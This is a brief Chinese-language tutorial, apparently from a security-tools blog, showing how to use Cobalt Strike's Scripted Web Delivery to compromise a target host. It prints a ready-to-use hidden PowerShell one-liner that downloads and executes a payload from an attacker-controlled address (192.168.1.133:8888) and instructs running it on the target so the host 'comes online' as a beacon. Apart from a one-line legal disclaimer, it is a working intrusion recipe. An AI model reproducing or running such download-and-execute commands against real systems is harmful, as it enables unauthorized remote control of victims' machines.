講過去像是在賣慘,講未來像是在白日做夢,講現在又像是旁觀者迷,遲遲無語,字字苦酸。。。
---- 網易雲熱評
一、新建Listeners,點擊save
二、利用powershell命令獲取目標主機的Beacon
1、選擇Attacks--Web Drive-by--Scripted web Delivery
2、選擇添加的Listener,點擊Launch
3、獲取powershell的單行指令
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.133:8888/a'))"
4、在目標主機的powershell中運行
5、目標主機上線
禁止非法,後果自負
歡迎關注公衆號:web安全工具庫